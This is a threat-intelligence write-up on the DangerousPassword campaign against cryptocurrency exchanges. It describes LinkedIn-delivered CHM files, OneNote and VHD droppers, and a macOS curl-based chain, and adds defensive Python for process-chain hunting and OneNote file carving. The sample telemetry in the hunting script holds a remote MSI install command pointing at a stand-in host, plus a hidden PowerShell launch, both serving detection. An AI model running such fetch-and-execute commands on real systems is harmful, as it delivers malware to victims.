
DangerousPassword Campaign: A Multi-Faceted Approach Exploiting Cryptocurrency Exchanges

JPCERT/CC has observed a campaign targeting cryptocurrency exchanges, tracked as DangerousPassword and also referred to as CryptoMimic or SnatchCrypto. Active since June 2019, the campaign initially delivered malware through malicious shortcut files sent by email. The attackers now use several infection techniques; the four distinct attack patterns observed are described below.

Malicious CHM files from LinkedIn

Attackers contact targets on LinkedIn from compromised accounts posing as recruiters, and send the malware through the platform.
  • The delivery vehicle is a RAR archive containing a CHM (compiled HTML Help) file.
  • When the CHM file is opened, it downloads and runs an external MSI file.
  • That MSI file drops a PowerShell script, which in turn downloads and executes a second MSI file (Administrator-a214051.msi).
  • The second MSI file collects information about the infected host and sends it to the attackers, Base64-encoded, in an HTTP POST request.

How the attackers obtained the compromised LinkedIn accounts is not known.
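As an added example (not code from the JPCERT/CC report or this page), the following Python script hunts for the CHM-to-MSI-to-PowerShell-to-MSI chain in process-creation telemetry. It assumes the CHM is opened by hh.exe (the Windows HTML Help viewer) and that each MSI runs under msiexec.exe; that parent-child chain is inferred from the description above, not stated in the report. The log lines are constructed in a simplified, Sysmon-like JSON shape, and the pids, paths and URL in them are invented.

```python
"""Hunt for the CHM -> MSI -> PowerShell -> MSI execution chain.

Assumptions (not stated in the report): the CHM is opened by hh.exe and each
MSI runs under msiexec.exe. Events are a constructed, simplified Sysmon
Event ID 1 export: one JSON object per line with pid/ppid/image/cmdline.
"""
import json
import re
from typing import Dict, List

# Constructed sample telemetry; pids, paths and the URL are invented.
SAMPLE_EVENTS = r'''
{"pid": 400, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 412, "ppid": 400, "image": "C:\\Windows\\hh.exe", "cmdline": "hh.exe C:\\Users\\u\\Downloads\\job_offer.chm"}
{"pid": 420, "ppid": 412, "image": "C:\\Windows\\System32\\msiexec.exe", "cmdline": "msiexec /q /i http://example.invalid/first.msi"}
{"pid": 431, "ppid": 420, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -nop -w hidden -File C:\\Users\\u\\AppData\\Local\\Temp\\stage.ps1"}
{"pid": 445, "ppid": 431, "image": "C:\\Windows\\System32\\msiexec.exe", "cmdline": "msiexec /q /i C:\\Users\\u\\AppData\\Local\\Temp\\Administrator-a214051.msi"}
{"pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\msiexec.exe", "cmdline": "msiexec /i C:\\installers\\notepadplusplus.msi"}
'''

# Root-first order of the chain: hh.exe spawns msiexec, which spawns
# powershell, which spawns the second msiexec.
CHAIN = ["hh.exe", "msiexec.exe", "powershell.exe", "msiexec.exe"]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> List[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(by_pid: Dict[int, dict], pid: int, max_depth: int = 32) -> List[str]:
    """Image names from `pid` upward to the root (self first)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen and len(names) < max_depth:
        seen.add(pid)  # guard against pid-reuse cycles in the data
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def find_chain_hits(events: List[dict], chain: List[str] = CHAIN) -> List[int]:
    """pids whose ancestry, read child-first, starts with the reversed chain."""
    by_pid = {e["pid"]: e for e in events}
    want = list(reversed(chain))
    return [e["pid"] for e in events
            if ancestry(by_pid, e["pid"])[: len(want)] == want]


# msiexec asked to install straight from a URL ("/i http://...").
REMOTE_MSI = re.compile(r"\s/i\s+https?://", re.IGNORECASE)


def find_remote_msi(events: List[dict]) -> List[int]:
    """msiexec installing from a remote URL is suspicious on its own."""
    return [e["pid"] for e in events
            if basename(e["image"]) == "msiexec.exe" and REMOTE_MSI.search(e["cmdline"])]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("chain hits:", find_chain_hits(evs))  # [445]
    print("remote MSI:", find_remote_msi(evs))  # [420]
```

The chain match is anchored on the final msiexec so that a benign msiexec launched from Explorer (pid 500 in the sample) is not flagged. The remote-install check is deliberately narrow; a production rule should also cover the `-i` and `/package` spellings and quoted URLs.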

Leveraging OneNote files

In this pattern a malicious OneNote file is used, and the infection starts as soon as the file is opened.
  • The OneNote file embeds a malicious MSI file, which installs and executes a DLL on the affected system.
  • The malware detects specific antivirus products and changes its behaviour accordingly.
  • Observed adaptations include hooking NTDLL to evade monitoring, altering the data in its curl commands, and changing how the downloaded payload is launched.
  • These measures make the malware harder to detect on the targeted systems.
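Added example, not part of the original page: a Python carver that extracts the files embedded in a OneNote section file, which is how a responder can pull the MSI described above out of the document without opening it. It relies on the FileDataStoreObject layout from Microsoft's MS-ONESTORE specification (header GUID, 8-byte length, 12 unused/reserved bytes, file data, footer GUID) and flags embedded OLE compound files (the container format MSI uses) and PE images. The input blob is constructed inline; it is not a sample from the campaign.

```python
"""Carve embedded files out of a OneNote (.one) section file.

OneNote stores attachments as FileDataStoreObject structures (MS-ONESTORE,
section 2.6.13): guidHeader (16 bytes), cbLength (8 bytes, little-endian),
4 unused bytes, 8 reserved bytes, FileData, guidFooter (16 bytes). The sample
below is a constructed blob, not a file from the campaign.
"""
import struct
from dataclasses import dataclass
from typing import List

# {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} and {71FBA722-0F79-4A0B-BB13-899256426B24}
# serialised as little-endian GUIDs, which is how they appear on disk.
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
FDSO_PREFIX_LEN = 16 + 8 + 4 + 8  # guidHeader + cbLength + unused + reserved

MAGICS = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole-cfb"),  # MSI and legacy Office files
    (b"MZ", "pe"),
    (b"%PDF", "pdf"),
    (b"Rar!\x1a\x07", "rar"),
    (b"PK\x03\x04", "zip"),
]
EXECUTABLE_KINDS = {"ole-cfb", "pe"}


def identify(data: bytes) -> str:
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return kind
    return "unknown"


@dataclass
class Embedded:
    offset: int      # offset of the header GUID in the file
    kind: str
    size: int
    footer_ok: bool  # footer GUID found where cbLength says it should be
    data: bytes


def carve(blob: bytes) -> List[Embedded]:
    """Return every complete FileDataStoreObject found in `blob`."""
    found, pos = [], 0
    while (i := blob.find(FDSO_HEADER, pos)) != -1:
        pos = i + len(FDSO_HEADER)
        if i + FDSO_PREFIX_LEN > len(blob):
            break
        (length,) = struct.unpack_from("<Q", blob, i + 16)
        start, end = i + FDSO_PREFIX_LEN, i + FDSO_PREFIX_LEN + length
        if end > len(blob):
            continue  # truncated: header present, data incomplete
        data = blob[start:end]
        footer_ok = blob[end:end + 16] == FDSO_FOOTER
        found.append(Embedded(i, identify(data), length, footer_ok, data))
    return found


def suspicious(objs: List[Embedded]) -> List[Embedded]:
    """Embedded objects that are installers or native binaries."""
    return [o for o in objs if o.kind in EXECUTABLE_KINDS]


# --- constructed sample (assumption: shape only, no real malware) -------------
def build_fdso(data: bytes) -> bytes:
    return FDSO_HEADER + struct.pack("<Q", len(data)) + b"\0" * 12 + data + FDSO_FOOTER


FAKE_MSI = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 24  # OLE header only
FAKE_PE = b"MZ" + b"\x90" * 62                                # MZ stub only
SAMPLE_ONE = (
    b"constructed-onenote-junk"
    + build_fdso(b"%PDF-1.7 decoy")
    + b"\0" * 8
    + build_fdso(FAKE_MSI)
    + b"\xff" * 4
    + build_fdso(FAKE_PE)
    # a fourth object whose declared length runs past the end of the file
    + FDSO_HEADER + struct.pack("<Q", 100) + b"\0" * 12 + b"short"
)


if __name__ == "__main__":
    for o in carve(SAMPLE_ONE):
        print(f"offset={o.offset:#x} kind={o.kind} size={o.size} footer_ok={o.footer_ok}")
    print("suspicious:", [o.kind for o in suspicious(carve(SAMPLE_ONE))])
```

On a real section file the object kinds matter more than the count: an `ole-cfb` or `pe` object sitting next to a decoy document is the pattern described above, and the carved bytes can be handed to further tooling. The footer check rejects a chance match on the header GUID, and the length check skips objects cut off by a partial download.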

Using virtual hard disk files

The DangerousPassword group conceals its malware in several container formats: ZIP and RAR archives, ISO images, and VHD (virtual hard disk) files.
  • A VHD file typically holds three components: a decoy PDF, the main malware as a DLL, and an EXE used to load the DLL.
  • The DLL's functionality is similar to that of the malware delivered in OneNote files.

Targeting macOS

DangerousPassword now targets macOS as well as Windows, using an AppleScript-based infection chain.
  • The AppleScript (main.scpt) downloads and executes an unauthorized application using the curl command.
  • Once running, the application displays a window and XOR-decodes the contents of files it reads.
  • It then connects to a C2 server and downloads a file according to the decoded instructions.
  • The downloaded file is executed on the compromised system.

The bottom line

DangerousPassword continues to conduct targeted attacks against cryptocurrency exchanges in Japan. Exercise caution on social networking services, particularly LinkedIn, since the attackers may use the platform to make first contact. Because the campaign is no longer limited to Windows, macOS users should also remain vigilant.
Publisher: Cyware